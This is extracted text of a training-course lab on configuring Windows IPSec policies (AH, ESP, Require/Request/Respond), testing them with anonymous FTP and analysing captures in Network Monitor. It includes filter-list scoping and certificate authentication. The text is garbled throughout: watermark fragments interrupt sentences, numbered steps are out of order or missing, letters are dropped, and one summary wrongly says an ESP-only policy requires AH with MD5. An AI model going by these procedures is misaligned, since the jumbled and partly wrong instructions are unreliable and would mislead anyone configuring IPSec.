The rst task will walk through the steps of using IPSec with ESP on one host, and not the other. As with the 1_REQUEST_AH(md5)_only policy, this transaction is also successful between Student_P and Student_Q because Student_Qs policy is designed to request onlynot demandIPSec. If a remote machine trying to communicate with Student_Q is not IPSec-aware or does not have a policy assigned to do so, then Student_Q will fall back to regular, insecure IP. As you saw before, the brief delay occurs because Student_Q is trying to establish an IPSec communication with Student_P.
Implementing an ESP IPSec Session

As you saw, with the mismatched IPSec policies as dened, there still is some communication; however it is not secure communication. In the next task, you will enable IPSec on both ends and initiate communication. Then, you will examine the network traffic in Network Monitor to see if, indeed, it is encrypted.
TASK 2D-4
Configuring and Analyzing an ESP IPSec Session
Note:Perform the following step only if you are designated as Student_P. 1.
Open your ipsec.mmc.msc console. Right-click the 3_RESPOND_ ESP(des)_only policy and choose Assign. Close the console.
Note: Perform the following step only if you are designated as Student_Q. 2. Start Network Monitor, and start a capture.
Note: Perform step 3 through step 5 only if you are designated as Student_P. 3. 4. 5. At the command prompt, again enter ftp IP_address_of_Student_Q. You should be able to successfully ftp to Student_Q. Log on as anonymous with no password.
Ed
T DU PL IC
Enter dir to see a list of les hosted on the ftp site, and exit the ftp session.
6. 7.
Observe that, after the ARP resolution has taken place (in frames 1 and 2), Student_P attempts to initiate a three-way handshake with Student_Q (in frame 3). Observe that, because the policy on Student_Q says to request IPSec communication, Student_Q begins the negotiation process (in frame 4) using the ISAKMP protocol (UDP port 500).
8.
st
9.
Observe that, when Student_P agrees to comply (in frame 5), there is an ISAKMP interplay between the two machines for the next few frames to negotiate and establish the IPSec protocol.
10. Observe that the actual three-way handshake is now completed in frames 14 and 15. 11. Close Network Monitor. You can save your capture to a le if you like.
In
DO
ru ct
Note: Perform the rest of this task only if you are designated as Student_Q.
NO
or
AT
E
113
iti
on
ESP Analysis
In the last task, you looked at the three-way handshake in frames 14 and 15. Are you sure you were looking at the three-way handshake? What do you see here thats different from the earlier capture (the one resulting from the AH_only policy)? You cannot see any of the TCP ags, connection setup, three-way handshake completion, or data transferin fact, nothing but encrypted stuff shows up! The protocol is listed simply as ESP. Nobody but these two endpoints can decrypt packets destined for them. Try to look for the name of the text le in response to the dir (LIST) command. From frames 14 onward until the session teardown, ESP ensures the condentiality of communication between the two machines; however, you have no way of knowing anything about the integrity of the packet, apart from those checks and balances built into TCP/IP. You never chose either the AH protocol nor the integrity algorithm of ESP. You chose only ESP for encryption.
TASK 2D-5
or
DO NO
ru ct
1.
Open your ipsec.mmc.msc console. Right-click the 3_RESPOND_ ESP(des)_only policy, and choose Un-assign. Note: Perform the rest of this task only if you are designated as Student_Q. Student_P is advised to follow along.
In
114
st
2. 3. 4.
Open your ipsec.mmc.msc console. Right-click the 3_REQUEST_ ESP(des)_only policy, and choose Un-assign. Create another IP Security Policy. Click Next.
For the IP Security Policy Name, enter 4_REQUIRE_ESP(des)_only, and click Next. Uncheck Activate The Default Response Rule, and click Next. Uncheck Edit Properties, and click Finish. Double-click the new policy.
5. 6. 7.
DU
Note:Perform the following step only if you are designated as Student_P.
PL
Implementing the 4_REQUIRE_ESP(des)_only IPSec Policy
IC
AT
Again, lets modify the situation a bit. Well congure Student_Q to demand IPSec of other computers. Well use the Require policy instead of the Request policy. From Student_P, well attempt to communicate with Student_Q and fail. Well then reassign the Respond policy on Student_P and re-establish communications with Student_Q.
Ed
Creating a Require ESP IPSec Policy
iti
on
8. 9.
On the Rules tab, verify that Use Add Wizard is unchecked, and click Add. On the IP Filter List tab, click the radio button for All IP Traffic.
10. Switch to the Filter Action tab. 11. Click the radio button for Require Security. 12. Click Edit. 13. Leave the radio button for Negotiate Security selected. 14. Remove all but one method by holding the Shift key, selecting all but one of the choices, and clicking Remove. Some congurations may have only one option. If so, skip the next step. 15. When prompted with Are You Sure?, click Yes. 16. Select the remaining method, and click Edit.
17. Under Security Method, select Custom. Click the Settings button found under Custom (For Expert Users), and make sure that AH is unchecked. 18. Verify that ESP is checked. 19. Leave ESPs integrity algorithm set to <None>. 20. For Encryption Algorithm, select DES.
Ed
T DU PL IC
26. Click OK, and click Close twice to end the policy modication.
st
Configuring a Require ESP IPSec Session
The following task covers several situations. First, there will be a mismatch between the two hosts, as Student_P and Q are using different forms of IPSec. Then, both hosts will use the same implementation, and the session will be analyzed in Network Monitor.
In
You have congured a policy where Student_Q will require other computers that attempt to communicate with it to implement AH by using the MD5 algorithm; Student_Q also will only respond using this algorithm.
DO
NO
ru ct
22. Click OK three times to return to the Rule Properties.
or
AT
E
115
iti
on
The mismatch part will not be successful because Student_Qs policy is designed to demand IPSec. If a remote machine trying to communicate with Student_Q is not IPSec-aware or does not have a policy assigned to do so, then Student_Q will not fall back to regular, insecure IP. As you saw before, a substantial delay will occur because Student_Q is trying to establish an IPSec communication with Student_P. Finally, once ESP is used on both ends of the communication, you will see that there is no difference with respect to the negotiation processthere is no difference with respect to the encryption of all subsequent information, and so forth. Once ISAKMP establishes the encryption algorithms between the two machines, as far as an eavesdropper is concerned, there will be nothing but binary garbage beyond the IP header.
TASK 2D-6
Note:Perform the following step only if you are designated as Student_Q.
Note: Perform step 2 through step 5 only if you are designated as Student_P. 2. 3. At the command prompt, again enter ftp IP_address_of_Student_Q. After a substantial delay, observe that you cannot ftp to Student_Q. In fact, you should receive a message indicating that the connection has timed out. Enter quit to stop the ftp attempt.
or
DO NO
ru ct
4. 5.
Note: Perform the following step only if you are designated as Student_Q.
In
116
st
6.
Start Network Monitor, and start a capture. Note: Perform step 7 through step 10 only if you are designated as Student_P.
7. 8. 9.
At the command prompt, again enter ftp IP_address_of_Student_Q. You should be able to successfully ftp to Student_Q. Log on as anonymous with no password. Enter dir to see a list of les hosted on the ftp site.
10. Exit the ftp session.
Open your ipsec.mmc.msc console. Right-click the 3_RESPOND_ ESP(des)_only policy, and choose Assign. Close the console.
DU
PL
IC
AT
1.
In your ipsec.mmc.msc console, right-click the 4_REQUIRE_ESP(des)_ only policy, and choose Assign. Close the console.
Ed
Require-and-Respond ESP Implementation and Analysis
iti
on
Note: Perform step 11 through step 12 only if you are designated as Student_Q. 11. In Network Monitor, stop and view the capture.
Close Network Monitor, saving the capture if you like.
Combining AH and ESP in IPSec
3. 4. 5. 6. 7. 8. 9.
Uncheck Activate The Default Response Rule, and click Next.
st
Double-click the new policy.
10. Click Edit.

In
On the Rules tab, verify that Use Add Wizard is unchecked, and click Add. On the IP Filter List tab, click the radio button for All IP Traffic. Switch to the Filter Action tab. Click the radio button for Request Security (Optional).
DO
Uncheck Edit Properties, and click Finish.
NO
2.
For the IP Security Policy Name, enter 5_REQUEST_AH(md5)+ESP(des), and click Next.
DU
1.
Open your ipsec.mmc.msc console. In the right pane, unassign the 4_REQUIRE_ESP(des)_only policy, and then create another IP Security Policy. Click Next.
ru ct
PL
IC
Creating the 5_REQUEST_AH(md5)+ESP(des) IPSec Policy and the Response Policy
or
AT
TASK 2E-1
Ed
You have congured and analyzed IPSec traffic by using AH, and IPSec traffic by using ESP. In this topic, you will congure and analyze network traffic that combines AH and ESP. When you are using both AH and ESP, you are conguring IPSec to its fullest strength.
iti
Topic 2E
on
12. Observe that these captures are exactly the same as when the 3_REQUEST_ESP(des)_only and the 3_RESPOND_ESP(des)_only policies were in force earlier.
11. Leave the radio button selected for Negotiate Security. 12. Read the options presented to you under Security Method Preference Order. 13. Remove all but one method by holding the Shift key, selecting all but one of the choices, and clicking Remove. Some congurations might have only one option. If so, skip the next step. 14. When prompted with Are You Sure?, click Yes. 15. Select the remaining method, and click Edit.
17. Verify that AH is checked.
19. Verify that ESP is checked.
20. Leave ESPs integrity algorithm set to <None>. 21. For Encryption Algorithm, select DES.
Ed
T DU
18. Select the integrity algorithm MD5.
23. Click OK three times to return to the Rule Properties. 24. Switch to the Authentication Methods tab.
or
DO NO
In
118
st
ru ct
25. Click Edit.
27. Click OK, and then click Close to return to the Policy Properties. 28. On the Rules tab, check <Dynamic> Default Response, and click Edit. The Use Add Wizard check box should remain unchecked. 29. Under Security Methods, hold the Shift key, select all but one of the choices, and click Remove. 30. Select the remaining method, and click Edit. 31. Under Security Method, click the Settings button found under Custom (For Expert Users). 32. Verify that AH is checked. 33. Select the integrity algorithm MD5. 34. Verify that ESP is checked.
PL
IC
AT
iti
16. Under Security Method, click the Settings button found under Custom (For Expert Users).
on
35. Leave ESPs integrity algorithm set to <None>. 36. For Encryption Algorithm, select DES. 37. Under the Session Key settings, verify that the two boxes for generating new keys for both time and size are unchecked. 38. Click OK twice to return to the Rule Properties. 39. Switch to the Authentication Methods tab. 40. Click Edit.
42. Click OK twice, and then click Close to exit the Policy Properties. 43. Close the console without saving settings.
Configuring the IPSec Response
or
DO NO
1.
2. 3. 4. 5. 6.
For the IP Security Policy Name, enter 5_RESPOND_AH(md5)+ESP(des), and click Next.
In
Uncheck Activate The Default Response Rule, and click Next. Uncheck Edit Properties, and click Finish. Double-click the new policy. On the Rules tab, verify that Use Add Wizard is unchecked, check <Dynamic> Default Response, and click Edit.
st
Open your ipsec.mmc.msc console. In the right pane, unassign the 3_RESPOND_ESP(des)_only policy, then create another IP Security Policy. Click Next.
Note:Perform this task only if you are designated as Student_P. Student_Q is advised to follow along.
DU
Creating the 5_RESPOND_AH(md5)+ESP(des) IPSec Policy
ru ct
PL
TASK 2E-2
IC
AT
You have congured a policy where Student_Q will request other computers that attempt to communicate with it to implement AH by using the MD5 integrity algorithm and ESP by using the DES encryption algorithm; Student_Q is also in a position to respond by using this algorithm. Lets congure Student_P to follow Student_Qs lead.
Ed
iti
on
7. 8. 9.
Remove all but one security method by holding the Shift key, selecting all but one of the choices, and clicking Remove. When prompted with Are You Sure?, click Yes. Select the remaining method, and click Edit.
10. Under Security Method, click the Settings button found under Custom (For Expert Users). 11. Verify that AH is checked. 12. Select the integrity algorithm MD5. 13. Verify that ESP is checked.
14. Leave ESPs integrity algorithm set to <None>.
16. Under the Session Key settings, verify that the two boxes for generating new keys for both time and size are unchecked. 17. Click OK twice to return to the Rule Properties.
ru ct st
21. Click OK twice, and then click Close to close the Policy Properties.
In
The initial communication will be an attempt at using FTP. As with the 1_REQUEST_AH(md5)_only and 3_REQUEST_ESP(des)_only policies, this transaction is also successful between Student_P and Student_Q because Student_ Qs policy is designed to requestnot demandIPSec. If a remote machine trying to communicate with Student_Q is not IPSec-aware or does not have a policy assigned to do so, then Student_Q will fall back to regular, insecure IP. The brief delay occurs because Student_Q is trying to establish an IPSec communication with Student_P. Once the connection is made, the second computer will be congured to respond to the rst properly.
DO
NO
You have just gone through the steps of conguring IPSec on both Student_P and Student_Q. In the next task, you will initiate a communication between the two hosts, and analyze the communication in Network Monitor.
AH and ESP IPSec Session Analysis
DU
22. Close the console without saving settings.
PL
IC
or
19. Click Edit.
AT
18. Switch to the Authentication Methods tab.
Ed
15. For Encryption Algorithm, select DES.
iti
on
TASK 2E-3
Configuring and Analyzing an IPSec Session Using AH and ESP
Note:Perform step 1 through step 2 only if you are designated as Student_Q. 1. 2. Open your ipsec.mmc.msc console. Right-click the 5_REQUEST_ AH(md5)+ESP(des) policy and choose Assign. Close the console. Start Network Monitor, and start a capture.
or
DO NO
3.
4. 5. 6. 7.
Open your ipsec.mmc.msc console. Right-click the 5_RESPOND_ AH(md5)+ESP(des) policy, and choose Assign. Note: Perform step 8 through step 10 only if you are designated as Student_Q.
9.
Observe the session between the two hosts.
10. Start a new capture (save the previous capture if you like).
11. At the command prompt, again enter ftp IP_address_of_Student_Q. You should be able to successfully ftp to Student_Q. 12. Log on as anonymous with no password.
In
Note: Perform step 11 through step 14 on Student_P.
st
8.
DU
Exit the ftp session.
ru ct
Enter dir to see a list of les hosted on the ftp site.
PL
IC
At the command prompt, again enter ftp IP_address_of_Student_Q. You should be able to successfully ftp to Student_Q after a very brief delay, even though an IPSec policy is assigned on Student_Q.
AT
E
121
Note: Perform step 3 through step 7 only if you are designated as Student_P.
Ed
iti
on
During the session analysis, try to note the differences from the earlier captures those resulting from the AH_only and ESP_only policies. Here, you are not able to see any of the TCP ags, connection setup, three-way handshake completion, or data transferin fact, you will see nothing but encrypted stuff! The protocol is listed simply as ESP. If you check the details within the IP header, IP points to AHIP protocol ID 51 (0x33) and AH points to ESPIP protocol ID 50 (0x32). After the IP header is AH/ESP. Nobody but these two endpoints can decrypt packets destined for them.
13. Enter dir to see a list of les hosted on the ftp site. 14. Exit the ftp session. Note: Perform step 15 through step 22 only if you are designated as Student_Q. 15. In Network Monitor, stop and view the capture.
16. Observe that, after the ARP resolution has taken place (in frames 1 and 2), Student_P attempts to initiate a three-way handshake with Student_Q (in frame 3). 17. Observe that, when the policy on Student_Q says to request IPSec communication, Student_Q begins the negotiation process (in frame 4) by using the ISAKMP protocol (UDP port 500).
19. Observe that the actual three-way handshake is now completed in frames 14 and 15.
ru ct st
Note: Perform the following step only if you are designated as Student_P.
23. Open your ipsec.mmc.msc console, unassign the 5_RESPOND_ AH(md5)+ESP(des) policy, and close the console.
In
DO
Again, lets modify the situation a bit. Youll congure Student_Q to demand IPSec of other computers by using the Require policy instead of the Request policy. From Student_P, youll attempt to communicate with Student_Q and fail. Youll then reassign the Respond policy on Student_P, so that you are able to establish communications with Student_Q.
NO
Requiring AH and ESP in an IPSec Session
DU
PL
IC
21. Observe that, from frames 14 onward until the session teardown, AH ensures integrity and ESP ensures condentiality of communication between the two machines.
or
AT
20. Search the packets, and try to look for the name of the text le in response to the dir (LIST) command.
Ed
18. Observe that, when Student_P agrees to comply (in frame 5), there is an ISAKMP interplay between the two machines for the next few frames to negotiate and establish the IPSec protocol.
iti
on
TASK 2E-4
Creating the 6_REQUIRE_AH(md5)+ESP(des) IPSec Policy
Note:Perform this task only if you are designated as Student_Q. Student_P is advised to follow along. 1. 2. 3. 4. 5. 6. 7. 8. 9. Open your ipsec.mmc.msc console, and unassign the 5_REQUEST_ AH(md5)+ESP(des) policy. Create another IP Security Policy. Click Next.
For the IP Security Policy Name, enter 6_REQUIRE_AH(md5)+ESP(des), and click Next. Uncheck Activate The Default Response Rule, and click Next. Uncheck Edit Properties, and click Finish. Double-click the new policy.
Switch to the Filter Action tab.
or
DO NO
On the IP Filter List tab, click the radio button for All IP Traffic.
10. Click the radio button for Require Security. 11. Click Edit.
13. If necessary, remove all but one security method. 14. Select the remaining method, and click Edit.
15. Under Security Method, click the Settings button found under Custom (For Expert Users).
17. Verify that ESP is checked.
19. For Encryption Algorithm, select DES. 20. Under the Session Key settings, verify that the two boxes for generating new keys for both time and size are unchecked. 21. Click OK. If you receive an information box indicating that you are on a Medium security level, click OK to agree to it.
In
18. Leave ESPs integrity algorithm set to <None>.
st
16. Verify that AH is checked and that the integrity algorithm is set to MD5.
DU
12. Leave the radio button selected for Negotiate Security.
ru ct
PL
IC
AT
On the Rules tab, verify that Use Add Wizard is unchecked, and click Add.
Ed
iti
on
22. Click OK twice to return to the Rule Properties. 23. Switch to the Authentication Methods tab. 24. Click Edit.
26. Click OK to close the Authentication Methods. 27. Click Close twice to exit the Policy Properties.
28. Assign the new policy, and close the console without saving settings.
You have congured a policy where Student_Q will require other computers that attempt to communicate with it to implement AH by using the MD5 algorithm; Student_Q also will respond only by using this algorithm. Now, lets see what happens when Student_P does not follow Student_Qs lead.
Ed
T DU
Using Mismatched AH and ESP IPSec Policies
Matching and Analyzing AH and ESP IPSec Policies

Note:Perform step 1 through step 2 only if you are designated as Student_Q.
or
DO NO
In
124
st
ru ct
1. 2. 3. 4. 5. 6. Enter quit. 7.
Activate Network Monitor, and start a capture. Monitor the network traffic between the Student_P and Student_Q machines, while the ftp session is attempted, and fails, due to mismatched policies. Note: Perform step 3 through step 6 only if you are designated as Student_P.
At the command prompt, again enter ftp IP_address_of_Student_Q.
Observe that, after a substantial delay, you are not able to ftp to Student_Q. In fact, you should receive a message stating that the connection has timed out.
Open your ipsec.mmc.msc console. Right-click the 5_RESPOND_ AH(md5)+ESP(des) policy and choose Assign. Close the console. Note: Perform the following step only if you are designated as Student_Q. Stop and view, then start a new capture.
PL
IC
AT
TASK 2E-5
iti
on
Note: Perform step 8 through step 11 only if you are designated as Student_P. 8. 9. At the command prompt, again enter ftp IP_address_of_Student_Q. You should be able to successfully ftp to Student_Q. Log on as anonymous with no password.
10. Enter dir to see a list of les hosted on the ftp site. 11. Exit the ftp session. Note: Perform the rest of this task only if you are designated as Student_Q. 12. In Network Monitor, stop and view the capture. 13. Observe that these captures are exactly the same as when the 5_REQUEST_AH(md5)+ESP(des) and the 5_RESPOND_ AH(md5)+ESP(des) policies were in force earlier.
14. Try to identify a difference in the negotiation process. There is no difference with respect to the negotiation process, there is no difference with respect to the encryption of all subsequent information, and so forth.
Ed
T DU PL IC
st
The AHs function is to sign the entire packet, including the IP header. However, there are certain elds in the IP header that have to be excluded because they are designed to change. One example of this is when traversing a routed environment, the 8-bit TTL eld will decrement by 1 at each hop. The values contained within these elds cannot be signed, as the received value would not match the value at origin.
In
Most books on IPSec recommend using AH to ensure the integrity of the entire packet and ESP just for condentiality of the payload. Most books on IPSec also simply say that ESP ...can also be used for integrity. Lets look at this a little more carefully.
DO
Someone may bring up the question, Hey, why would you use the integrity algorithm twice? At this point, well leave the answer as a smug Because we can! Actually, there is a more simplied explanation.
NO
Now, lets step up the requirements for IPSec. Lets say you were paranoid and wanted to use all the features set to their highest security settings. You will congure an IPSec policy on Student_Q that will use the SHA-1 algorithm to ensure integrity and 3DES to ensure condentiality. You will then congure Student_Q to demand IPSec of other computers. To do so, you will use a Require policy instead of a Request policy. Finally, on Student_P, you will implement a corresponding Respond policy and establish communications with Student_Q.
ru ct
Configuring All the Options
or
AT
15. Examine the data beyond the IP header. Once ISAKMP establishes the encryption algorithms between the two machines, as far as an eavesdropper is concerned, there will be nothing but binary garbage beyond the IP header.
iti
on
The ESPs function is to encrypt and/or sign everything but the IP header. In Transport Mode, using ESPs signing functionality might be considered redundant when AH is around to do the job, especially when AH can sign even the IP headers (mostly). Its when IPSec is implemented in Tunnel Mode, as with a VPN solution, that ESPs signing functionality has some meaning over and above that of AH. In Tunnel Mode, there are two IP headers in each packet. The outer IP header is the one used by the tunnel endpoints to communicate with each other. Encapsulated within this as payload data is the IP header, IP protocol, and the actual data of the two hosts communicating end-to-end via the tunnel. Therefore, when the tunnel endpoints use ESPs integrity algorithm, the internal IP headers are treated as data and will be completely signed. By the way, before you get carried away with IPSec, it is also recommend that you read Bruce Schneiers excellent critique on IPSec. You can nd it at his companys Web site, www.counterpane.com.
TASK 2E-6
Implementing the 7_REQUIRE_ AH(sha)+ESP(sha+3des) Policy
Ed
T DU
1. 2. 3. 4. 5. 6. 7. 8. 9.
Create another IP Security Policy. Click Next.
or
DO NO
In
126
st
ru ct
10. Click Edit.
Uncheck Activate The Default Response Rule, and click Next. Uncheck Edit Properties, and click Finish. Double-click the new policy.
On the Rules tab, verify that Use Add Wizard is unchecked, and click Add. On the IP Filter List tab, click the radio button for All IP Traffic. Switch to the Filter Action tab. Click the radio button for Require Security.
11. Leave the radio button selected for Negotiate Security. 12. If necessary, remove all but one security method. 13. Select the remaining method, and click Edit.
PL
For the IP Security Policy Name, enter 7_REQUIRE_ AH(sha)+ESP(sha+3des), and click Next.
IC
AT
iti
on
14. Under Security Method, click the Settings button found under Custom (For Expert Users). 15. Verify that AH is checked. 16. Select the integrity algorithm as SHA1. 17. Verify that ESP is checked. 18. Select ESPs integrity algorithm as SHA1. 19. For Encryption Algorithm, select 3DES. 20. Under the Session Key settings, verify that the two boxes for generating new keys for both time and size are unchecked. 21. Click OK three times to return to the Rule Properties. 22. Switch to the Authentication Methods tab. 23. Click Edit.
24. Click the radio button for Use This String To Protect The Key Exchange (Preshared Key), and in the box, enter Purple Enigma to provide the text for the preshared key. 25. Click OK, and then click Close twice to exit the Policy Properties. 26. Close the console without saving settings.
Ed
T DU PL IC
Configuring the AH-and-ESP IPSec Response Policy
In order for the two hosts to communicate, they must have compatible IPSec policies implemented. By now, you are familiar with the procedure, so the following task should be rather straightforward.
TASK 2E-7
Implementing the 7_RESPOND_ AH(sha)+ESP(sha+3des) Policy
st
Note:Perform this task only if you are designated as Student_P. Student_Q is advised to follow along.
2. 3. 4.
In
1.
Create another IP Security Policy. Click Next. For the IP Security Policy Name, enter 7_RESPOND_ AH(sha)+ESP(sha+3des), and click Next. Uncheck Activate The Default Response Rule, and click Next. Uncheck Edit Properties, and click Finish.
DO
ru ct
NO
or
AT
iti
on
5. 6. 7. 8. 9.
Double-click the new policy. On the Rules tab, verify that Use Add Wizard is unchecked, check <Dynamic> Default Response, and click Edit. Remove all but one security method. Select the remaining method, and click Edit.
Under Security Method, click the Settings button found under Custom (For Expert Users).
10. Verify that AH is checked. 11. Select the integrity algorithm as SHA1. 12. Verify that ESP is checked.
14. For Encryption Algorithm, select 3DES.
15. Under Session Key settings, verify that the two boxes for generating new keys for both time and size are unchecked.
18. Click Edit.
or
DO NO
17. Switch to the Authentication Methods tab.
ru ct
21. Close the console without saving settings.
Implementing the Full IPSec Session

So far, you have congured a policy where Student_Q will require other computers that attempt to communicate with it to implement AH by using the SHA-1 algorithm and ESP by using both the SHA-1 and 3DES algorithms; Student_Q also will respond only by using this algorithm. Now, lets see what happens when Student_P follows Student_Qs lead. When you perform the nal analysis in Network Monitor, keep the following in mind: If you were to perform a Hex-to-Hex comparison of the two captures, you would see that due to the additional overhead imposed by the 7_REQUIRE_ AH(sha)+ESP(sha+3des) policy over the 6_REQUIRE_AH(md5)+ESP(des) policy, the actual number of bits is greater. In fact, if you had tried to actually transfer large les between the two machines, then the number of frames would have actually been greater.
In
st
DU
20. Click OK twice, and then click Close to exit the Policy Properties.
PL
IC
AT
16. Click OK twice to return to the Rule Properties.
Ed
13. Select ESPs integrity algorithm as SHA1.
iti
on
TASK 2E-8
Implementing and Analyzing an AH(sha) and ESP(sha+3des) IPSec Session
Note:Perform step 1 through step 2 only if you are designated as Student_Q. 1. Open your ipsec.mmc.msc console. Assign the 7_REQUIRE_ AH(sha)+ESP(sha+3des) policy. When you assign this policy, the previously assigned policy is automatically unassigned. Start Network Monitor, and start a capture.
Note: Perform step 3 through step 7 only if you are designated as Student_P. 3. 4. 5. 6. 7. Open your ipsec.mmc.msc console. Assign the 7_RESPOND_ AH(sha)+ESP(sha+3des) policy.
At the command prompt, enter ftp IP_address_of_Student_Q. You should be able to successfully ftp to Student_Q. Log on as anonymous with no password. Enter dir to see a list of les hosted on the ftp site. Exit the ftp session.
Ed
T DU PL IC
Note: Perform the rest of this task only if you are designated as Student_Q. 8. 9. In Network Monitor, stop and view the capture.
Observe that these captures are more or less the same as when the 6_REQUIRE_AH(md5)+ESP(des) and 5_RESPOND_AH(md5)+ESP(des) policies were in force earlier.
10. Identify any differences with respect to the negotiation process, encryption, or integrity algorithms. 11. Close Network Monitor. You can save your capture to a le if you like.
In
In all of the previous scenarios, we spent most of the time trying to gure out the effect of using various combinations of integrity and condentiality algorithms. Once you have decided on a particular combination, you can also leverage the policy to explicitly secure network traffic, depending on network or host ID or protocol. You can do this by editing the lter list.
DO
Using the Filter Lists
st
ru ct
NO
or
AT
E
129
iti
2.
on
TASK 2E-9
Editing Filter Lists to Explicitly Secure Traffic
Note:Perform step 1 through step 18 only if you are designated as Student_Q. 1. 2. 3. 4. 5. 6. 7. 8. 9. From the Start menu, choose SettingsNetwork And Dial-up Connections.
Right-click the Classroom Hub interface, and choose Enable.
Open the ipsec.mmc.msc console and unassign the 7_REQUIRE_ AH(sha)+ESP(sha+3des) policy. Double-click the policy 7_REQUIRE_AH(sha)+ESP(sha+3des). On the Rules tab, under IP Security Rules, select All IP Traffic. Click Edit.
10. Under Filters, observe that one rule is already included for you. 11. Select this rule and click Edit.
or
DO NO
ru ct In
12. In the Filter Properties dialog box, observe the drop-down lists for Source Address and Destination Address.
13. For Source Address, select My IP Address, if necessary. 14. For Destination Address, select A Specic IP Address. 15. In the IP Address box, enter the specic IP address for Student_P (172.26. 10.x or 172.28.10.x). 16. Leave Mirrored checked.
st
17. Click OK, and then click Close three times. 18. Right-click the policy 7_REQUIRE_AH(sha)+ESP(sha+3des), and choose Assign. Note: Perform step 19 through step 24 only if you are designated as Student_P.
19. From the Start menu, choose SettingsNetwork And Dial-up Connections. 20. Right-click the Partner interface, and choose Properties.
DU
PL
IC
AT
Click Edit.
Under IP Filter Lists, select All IP Traffic.
Ed
iti
Ping the IP address of your nearest router. You should not be able to reach the router, as the IPSec policy on your machine is restrictive.
on
21. Double-click Internet Protocol (TCP/IP). 22. Edit the IP address by adding 100 to the last octet. That is, if the IP address is 172.26.10.1, make it 172.26.10.101. 23. Click OK twice. 24. At a command prompt, enter ipcong to verify the change in your IP address. Note: Perform the next step only if you are designated as Student_Q. 25. Activate Network Monitor, and start a capture. Note: Perform step 26 through step 29 only if you are designated as Student_P.
27. Log on as anonymous with no password. 28. Enter dir to see a list of les hosted on the ftp site. 29. Exit the ftp session, and close all open windows.
Ed
T DU PL IC
26. At the command prompt, enter ftp IP_address_of_Student_Q. You should be able to successfully ftp to Student_Q.
Note: Perform the rest of this task only if you are designated as Student_Q. Student_P is advised to follow along and participate in any ensuing discussion. 30. In Network Monitor, stop and view the capture.
31. Observe that there is no ISAKMP negotiation, no ESP, and so forth.
32. Why did the supposedly secure Require IPSec policy allow Student_P to communicate with it in plaintext? When you added the specications to the lter list, Student_Q looked to see if the specic IP address was in the IP header. It would apply IPSec policies only if its communication was with the specied machine. Because Student_ Ps IP address was changed, its IP header did not match that on the lter. So, insecure communication was allowed to take place.
st
33. Ping your nearest router.
In
Are you able to ping the router? Why or why not? You are able to ping the router for the same reason as Student_P could communicate with Student_Q. What this means is that, if traffic between sensitive machines needs to be protected, you can modify the lter lists to do so. All other traffic to those same machines from other hosts will not be protected. It is up to you as the IPSec policy designer to come up with these schemes for your company.
DO
ru ct
NO
or
Now lets look at the captures in Network Monitor and see what was different from the previous capture.
AT
iti
on
34. Close Network Monitor and any other open windows. 35. Disable the Classroom Hub interface. The Partner interface should still be enabled.
TASK 2E-10
Note:Perform step 1 through step 12 on all student computers. 1. 2. 3. 4. 5. 6. 7. 8. In your ipsec.mmc.msc console, choose ConsoleAdd/Remove Snap-in. Click Add.
Ed
T DU
Using Certificates for Authentication
Click Finish, click Close, and then click OK. Expand Certicates (Local Computer).
st
11. Select newroot.cer and click Open. 12. Click Next twice, and then click Finish. Click OK. Note: Perform step 13 through step 22 only if you are designated as Student_Q.
In
13. Click IP Security Policies On Local Machine. 14. Double-click 7_REQUIRE_AH(sha)+ESP(sha+3des).

DO
ru ct
9. Click Next.
Expand Trusted Root Certication Authorities.
Right-click Certicates, and choose All TasksImport. The Certicate Import Wizard is displayed.
10. Click Browse and browse to the IPSec certicate on your course CD-ROM, in the \085545\Data\Certicates folder. You might have to click the Files Of Type drop-down list and select X.509 or *.cer to see the certicate.
NO
PL
IC
Select the radio button for Computer Account, and click Next.
or
Click Certicates, and click Add.
AT
iti
Installing CAs and certicates was covered in detail in the prerequisite courses.
Without going into the details of setting up a CA or obtaining IPSec certicates from a CA, we will see how easy it is to use a certicate for IPSec once you have it. An IPSec certicate contains all of the attributes and keys required to leverage the integrity and condentiality functions of IPSec. We have created a certicate that you can use for this purpose.
on
Using Certificates
15. Select All IP Traffic and click Edit. 16. On the IP Filter List tab, select All IP Traffic, and click Edit. Edit the lter to return the Destination Address to Any IP Address. Click OK, and then click Close.
18. Click Edit. 19. Select the radio button for Use A Certicate From This CA, and click Browse. 20. Scroll down the list and select SCPR01. Feel free to view and explore the certicate if you like. Click OK. 21. Click OK, and then click Close twice.
Note: Perform step 23 through step 37 only if you are designated as Student_P. 23. Click IP Security Policies On Local Machine.
Ed
T DU PL IC
22. Verify that the 7_REQUIRE_AH(sha)+ESP(sha+3des) policy is assigned, and close the console.
25. Click Edit.
26. Click the Authentication Methods tab. 27. Click Edit.
28. Select the radio button for Use A Certicate From This CA, and click Browse.
29. Scroll down the list and select SCPR01. Feel free to view and explore the certicate if you like. Click OK.
st
31. Verify that the 7_RESPOND_AH(sha)+ESP(sha+3des) policy is assigned, and close the console without saving the settings. 32. From the Start menu, choose SettingsNetwork And Dial-up Connections.
34. Double-click Internet Protocol (TCP/IP). 35. Edit the IP address by subtracting 100 from the last octet. That is, if the IP address is 172.26.10.101, go back to your originally assigned IP address for that interface and make it 172.26.10.1. 36. Click OK twice.
In
33. Right-click the Partner interface, and choose Properties.
DO
NO
30. Click OK twice, and then click Close.
ru ct
or
AT
24. Double-click 7_RESPOND_AH(sha)+ESP(sha+3des).
iti
on
17. Click the Authentication Methods tab.
37. Open a command prompt and enter ipcong to verify the change in your IP address. Note: Perform the next step only if you are designated as Student_Q. 38. Activate Network Monitor, and start a capture. Note: Perform step 39 through step 42 only if you are designated as Student_P.
40. Log on as anonymous with no password.
41. Enter dir to see a list of les hosted on the ftp site. 42. Exit the ftp session.
Note: Perform the rest of this task only if you are designated as Student_Q. 43. In Network Monitor, stop and view the capture. 44. Verify that ISAKMP negotiations took place, and then close Network Monitor.
Ed
T DU
st
1. 2. 3. 4. 5.
Open the ipsec.mmc.msc. Verify that all IPSec policies are listed as Unassigned. If a policy is still assigned, unassign it now. Close the console, saving changes if you like. In the Network And Dial-up Connections Control Panel, right-click the Classroom Hub interface, and choose Enable. Right-click the Partner interface, and choose Disable.
134
In
DO
ru ct
TASK 2E-11
Removing IPSec
Note:Perform this task on all student machines.
NO
PL
Now that you have examined and implemented various forms of IPSec, you need to turn IPSec off to ensure that the remainder of the tasks throughout the course will run smoothly, and with no issues.
IC
Disabling IPSec
or
AT
iti
39. At the command prompt, enter ftp IP_address_of_Student_Q. You should be able to successfully ftp to Student_Q. If the ftp attempt does not work, skip the next three steps.
on
6. 7.
Ping an IP address elsewhere in the classroom to be sure you have the proper connectivity. Close all open windows.
